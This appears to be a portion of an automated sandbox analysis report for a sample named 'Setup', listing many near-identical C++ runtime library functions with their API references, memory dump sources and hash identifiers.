__EH_prolog3.LIBCMT ref: 02D90B35
std::_Lockit::_Lockit.LIBCPMT ref: 02D90B3F

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D90B90
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90BB0
Concurrency::cancel_current_task.LIBCPMT ref: 02D90BBD

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 29b1f465f0d6b36a5eacdf906a2532ca53482e7993baf44fc19236f203bab5fc
Instruction ID: 13a4f7358d2c1e7c8918d0f67ca0c827e9e0c77a0c1b85e1d3186d9c05cbac15
Opcode Fuzzy Hash: 29b1f465f0d6b36a5eacdf906a2532ca53482e7993baf44fc19236f203bab5fc
Instruction Fuzzy Hash: 0F01C031900129CBCF05EBA4D9506FDBBA2EF84319F24455EE8126B390EF749E02CFA5

Function 02D91893 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9189A
std::_Lockit::_Lockit.LIBCPMT ref: 02D918A4

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D918F5
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91915
Concurrency::cancel_current_task.LIBCPMT ref: 02D91922

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4aaa0c0f37d954dc2845ab0b8ff5143bf824a4f50e11b3f36bbf45816ea4a65d
Instruction ID: d0a866117e28390bb1289e3faf66fdea2bf3c2eedc1d0dd4d19ae8d4db70898a
Opcode Fuzzy Hash: 4aaa0c0f37d954dc2845ab0b8ff5143bf824a4f50e11b3f36bbf45816ea4a65d
Instruction Fuzzy Hash: DD01ED32800116AFCF05EB64C9506BDBBB2EF84314F24411AE91567380CF759E01CFA5

Function 02D91928 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9192F
std::_Lockit::_Lockit.LIBCPMT ref: 02D91939

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9198A
std::_Lockit::~_Lockit.LIBCPMT ref: 02D919AA
Concurrency::cancel_current_task.LIBCPMT ref: 02D919B7

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 08b0ea23e7e6d866aadf172a7b739f1a641a5e306b328bb99c0fade05440d404
Instruction ID: 3bebf1f1c2e6a7a78cfb20e61f317fcea94c844dcbf77af5b62a623561d2c34e
Opcode Fuzzy Hash: 08b0ea23e7e6d866aadf172a7b739f1a641a5e306b328bb99c0fade05440d404
Instruction Fuzzy Hash: 48018B319001169FCF05EB68C9506BDBBA2EF84320F24451AE82567390DF75DE05CFA5

Function 02D9CE84 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CE8B
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CE95

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9CEE6
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CF06
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CF13

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 6af1f5f9da23b7e1cd9a268b081a6a925a14e43f6530b0c14dc6b34023f60ff1
Instruction ID: 835456f245227daca1fb72c74cf7813e93a3bf9064469959355d01111b01f5aa
Opcode Fuzzy Hash: 6af1f5f9da23b7e1cd9a268b081a6a925a14e43f6530b0c14dc6b34023f60ff1
Instruction Fuzzy Hash: A101AD329101258FCF05EBA4C9506BDBBB2EF88711F24451EE411AB3C0DF749E05CBA9

Function 02D90CED Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90CF4
std::_Lockit::_Lockit.LIBCPMT ref: 02D90CFE

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D90D4F
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90D6F
Concurrency::cancel_current_task.LIBCPMT ref: 02D90D7C

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 3ff3b43df0f9d77caeec8f88d706d4a4377a2003f8e7ddfca59d75eac732c99c
Instruction ID: 1fe73fe23c279d2b34ec9b164c1f3c0a0560276982ed17c99cfbae628a8635d5
Opcode Fuzzy Hash: 3ff3b43df0f9d77caeec8f88d706d4a4377a2003f8e7ddfca59d75eac732c99c
Instruction Fuzzy Hash: 8501AD729001158FCF05EB68D9506BDBBB6EF84311F24441EE81167390DF76AE02CFA5

Function 02D90C58 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90C5F
std::_Lockit::_Lockit.LIBCPMT ref: 02D90C69

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D90CBA
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90CDA
Concurrency::cancel_current_task.LIBCPMT ref: 02D90CE7

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 0c5663da46332026660ece363f6c8b8e80b96402850bb17a066416aad4c4d3ce
Instruction ID: 785c47d4f95382b2cd07ecb3977915025cd0227059f0059ff66e4fe06152a68e
Opcode Fuzzy Hash: 0c5663da46332026660ece363f6c8b8e80b96402850bb17a066416aad4c4d3ce
Instruction Fuzzy Hash: 4F01CC31900125CBCF05EBA4D954ABDBBA2EF84311F25461EE911AB380DF749E45CFA9

Function 02D9CC30 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CC37
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CC41

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9CC92
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CCB2
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CCBF

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: c887c67a4c1c0311cd8f6bfe161ba9f86e227e6528e66d5226c937a11ce952c4
Instruction ID: 7ab914be114d31b1bec6e32eb531b9ff909a1ef510e0a649c2d8bf4288baff2d
Opcode Fuzzy Hash: c887c67a4c1c0311cd8f6bfe161ba9f86e227e6528e66d5226c937a11ce952c4
Instruction Fuzzy Hash: 7901C0319101258FCF05FBA4C9546BDBBA2EF88310F24451EE41567390DF759E01CFA9

Function 02D9CDEF Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CDF6
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CE00

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9CE51
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CE71
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CE7E

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 74fc1503e775dff1ef516f62a953a82b3665f556a2321cbf79723ae5258649c8
Instruction ID: 5b082ee2dfcdeb6354b6d313f0cd6c9cec9ef1f977764ed9c9dd0ddc07e9767f
Opcode Fuzzy Hash: 74fc1503e775dff1ef516f62a953a82b3665f556a2321cbf79723ae5258649c8
Instruction Fuzzy Hash: F301AD329101168FCF05EBA4C9506BEBBB6EF88710F24441AE811A7390DF759E01CFA5

Function 031DF34A Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF351
std::_Lockit::_Lockit.LIBCPMT ref: 031DF35B

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF3AC
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF3CC
Concurrency::cancel_current_task.LIBCPMT ref: 031DF3D9

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 5dd4b93c74347d6daa1cfe3f1b4e528b03393a36ec6dc1f1a125427988e3b4b2
Instruction ID: 11842b6f1885d717839006a09735e26336747cffa728083a28bbcbdd7498ac5d
Opcode Fuzzy Hash: 5dd4b93c74347d6daa1cfe3f1b4e528b03393a36ec6dc1f1a125427988e3b4b2
Instruction Fuzzy Hash: 3A01807A910219ABCB05EBB8D9147BEB7B5AF4D311F154509D412AF2C4CFB49A42C790

Function 031DF3DF Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF3E6
std::_Lockit::_Lockit.LIBCPMT ref: 031DF3F0

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF441
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF461
Concurrency::cancel_current_task.LIBCPMT ref: 031DF46E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b0b2465516065615ac4b509c4c73b62b5676de96a1257773a6bc296f7b571dba
Instruction ID: ad671cc65ce2cf4ff98fa9b1aa2d31293a55bcbc68de47458b587dbf641673a9
Opcode Fuzzy Hash: b0b2465516065615ac4b509c4c73b62b5676de96a1257773a6bc296f7b571dba
Instruction Fuzzy Hash: 2801D23A9042199FCB08FBA8D958ABEB7B5AF4D710F144009D4116F2C0CFB4AB42CB80

Function 031E0144 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E014B
std::_Lockit::_Lockit.LIBCPMT ref: 031E0155

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031E01A6
std::_Lockit::~_Lockit.LIBCPMT ref: 031E01C6
Concurrency::cancel_current_task.LIBCPMT ref: 031E01D3

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b321c6914d8426ac7e8ccd9ebe351839f499e342a1fb512a930145b862a6eea4
Instruction ID: 4508d85c17797567e24712f41d33bcfe9d3efd3488fe183f61daff80dc35e4ad
Opcode Fuzzy Hash: b321c6914d8426ac7e8ccd9ebe351839f499e342a1fb512a930145b862a6eea4
Instruction Fuzzy Hash: 9401923E9007199BCB09FBA8D954ABEB7B5AF4D710F184109D4106F280CFB4DA818B91

Function 031E001A Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E0021
std::_Lockit::_Lockit.LIBCPMT ref: 031E002B

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031E007C
std::_Lockit::~_Lockit.LIBCPMT ref: 031E009C
Concurrency::cancel_current_task.LIBCPMT ref: 031E00A9

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: c9fb8191ebfafa8b1ac3e8abf7490ec7d21b231cbe9749835f54407a1f5a8e2f
Instruction ID: e0e00dda2c1cc3b18ff98d1a6976508550265eacbfc37844327a47cb016d72ce
Opcode Fuzzy Hash: c9fb8191ebfafa8b1ac3e8abf7490ec7d21b231cbe9749835f54407a1f5a8e2f
Instruction Fuzzy Hash: 4501DE7E900B199FCB04EBA8D944ABEB7B5AF8C721F180509D4106F280CFB5DA81CB80

Function 031E00AF Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E00B6
std::_Lockit::_Lockit.LIBCPMT ref: 031E00C0

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031E0111
std::_Lockit::~_Lockit.LIBCPMT ref: 031E0131
Concurrency::cancel_current_task.LIBCPMT ref: 031E013E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 05e494f989ba0e6e81f86a89b2267f4c7605f8c4e0a0e2dd732fcebb244bed65
Instruction ID: b01ad4891bf8033f2ea6f4f2bb5bc8b670be446534c3bec4caaa12c902232677
Opcode Fuzzy Hash: 05e494f989ba0e6e81f86a89b2267f4c7605f8c4e0a0e2dd732fcebb244bed65
Instruction Fuzzy Hash: F201807E9047199BCB05EBA8D9046BEB7B5AF4D710F154109D5106F384CFB59A81CB90

Function 031DF75D Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF764
std::_Lockit::_Lockit.LIBCPMT ref: 031DF76E

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF7BF
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF7DF
Concurrency::cancel_current_task.LIBCPMT ref: 031DF7EC

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: cd2f6caec6061bf728ef93700ae70266dccb7f37f576fac01b4af3c2eb9c4617
Instruction ID: 3a7a32df3f78c8cfa5b3d064b002b0dd963d5f7f396a4274facd040f522bf863
Opcode Fuzzy Hash: cd2f6caec6061bf728ef93700ae70266dccb7f37f576fac01b4af3c2eb9c4617
Instruction Fuzzy Hash: 2501C03E9003199FCB04EBA8D9446FEB7A5AF89310F240109D412AB2C0CFB49A81CB80

Function 031DF7F2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF7F9
std::_Lockit::_Lockit.LIBCPMT ref: 031DF803

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF854
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF874
Concurrency::cancel_current_task.LIBCPMT ref: 031DF881

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: cead84f0533c675a1a8bfe06e4356f3a2ed7ebff304230548f3ec3f190995fea
Instruction ID: 80712d1f82ff1ce6460801572176576e74b9e4b11f4ea4e99c90d43bf1272c50
Opcode Fuzzy Hash: cead84f0533c675a1a8bfe06e4356f3a2ed7ebff304230548f3ec3f190995fea
Instruction Fuzzy Hash: 4001D23E910619AFCB04EBA8D904BBEB7F5BF4D311F280009D4116F280CFB4AA52CB81

Function 031DF509 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF510
std::_Lockit::_Lockit.LIBCPMT ref: 031DF51A

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF56B
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF58B
Concurrency::cancel_current_task.LIBCPMT ref: 031DF598

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 07bc2c9ee2dc2e79f6bf23674e23abad2bc5aae8fe07a8e02ed2ca6484362858
Instruction ID: 61eb3bd7e31d8960a453bc9c269d6f95959b44fcae01cfcac409b588c2e0eb97
Opcode Fuzzy Hash: 07bc2c9ee2dc2e79f6bf23674e23abad2bc5aae8fe07a8e02ed2ca6484362858
Instruction Fuzzy Hash: 6201927A9002199BCB05FFA8D9046BEB7B5AF9E311F184549D4116F280CFB49B42CB90

Function 031DF474 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF47B
std::_Lockit::_Lockit.LIBCPMT ref: 031DF485

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF4D6
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF4F6
Concurrency::cancel_current_task.LIBCPMT ref: 031DF503

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8fb30f4ab28f9f4b3912b85b464222e785896e50f3d6426376384effb098a233
Instruction ID: 91cefe1905b7a71b4e40b1362d6dd6fdb9b0381ea06e57bf561418097c9d2663
Opcode Fuzzy Hash: 8fb30f4ab28f9f4b3912b85b464222e785896e50f3d6426376384effb098a233
Instruction Fuzzy Hash: 0F01843A9043199BCB05EBA8D5146BEB7B5AF4D710F254509D5156B280CFB49B82C790

Function 031DF91C Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF923
std::_Lockit::_Lockit.LIBCPMT ref: 031DF92D

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF97E
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF99E
Concurrency::cancel_current_task.LIBCPMT ref: 031DF9AB

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 7654dc1a475e5cbf911787fad97017efe16697a69a242747c21befad2bb2e608
Instruction ID: 316016697606cce3633317bd75a25eaa945e89c075225e735570e5aa8bafda2a
Opcode Fuzzy Hash: 7654dc1a475e5cbf911787fad97017efe16697a69a242747c21befad2bb2e608
Instruction Fuzzy Hash: 1801D679D10719ABCB08EBA8D8446BEB7B5AF8D720F290009E4126F2C0CF749B42C780

Function 031DF887 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DF88E
std::_Lockit::_Lockit.LIBCPMT ref: 031DF898

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DF8E9
std::_Lockit::~_Lockit.LIBCPMT ref: 031DF909
Concurrency::cancel_current_task.LIBCPMT ref: 031DF916

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: fefd378d27a9050e6715bd8cdde693698f3ef881846098e15a74f66542ddbba6
Instruction ID: aa0125471a625b63cdc09cda5e8af471ec3087737973843be10eb5a612ec5c8d
Opcode Fuzzy Hash: fefd378d27a9050e6715bd8cdde693698f3ef881846098e15a74f66542ddbba6
Instruction Fuzzy Hash: 8B01D23AD00719ABCB08EBA8D9047BEB7B5AF4D310F144109E4126F284CFB49B56CB90

Function 031DFF85 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFF8C
std::_Lockit::_Lockit.LIBCPMT ref: 031DFF96

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DFFE7
std::_Lockit::~_Lockit.LIBCPMT ref: 031E0007
Concurrency::cancel_current_task.LIBCPMT ref: 031E0014

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 6ab3b6741d96465375425510eb99a4c8f54c0f0ef6e77d6826c05c266676919d
Instruction ID: 7673c9ab69bb4bb62943c6ccc7b439e1f4f21b8b0a33581dbbb69016102442be
Opcode Fuzzy Hash: 6ab3b6741d96465375425510eb99a4c8f54c0f0ef6e77d6826c05c266676919d
Instruction Fuzzy Hash: 6601D27A9007199BCB04EBA8D8046BEB7B9AF4D321F240509D5106F380CFB49E81C790

Function 031DFD2F Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFD36
std::_Lockit::_Lockit.LIBCPMT ref: 031DFD40

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DFD91
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFDB1
Concurrency::cancel_current_task.LIBCPMT ref: 031DFDBE

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 90d15e6bfeeaf59804a8ad52ef31cb2a25d045a9df1e3b2f32ffe0e20d6aa7ac
Instruction ID: 9634a58c36f12e6c524bc11e7fdd3d5e998a6493edbede728c295a2c6dd0466c
Opcode Fuzzy Hash: 90d15e6bfeeaf59804a8ad52ef31cb2a25d045a9df1e3b2f32ffe0e20d6aa7ac
Instruction Fuzzy Hash: 4A01923A9107199FCB05EBA8E9047BEB7B5AF5A710F254109D4116F384CFB49A81C791

Function 031DFDC4 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFDCB
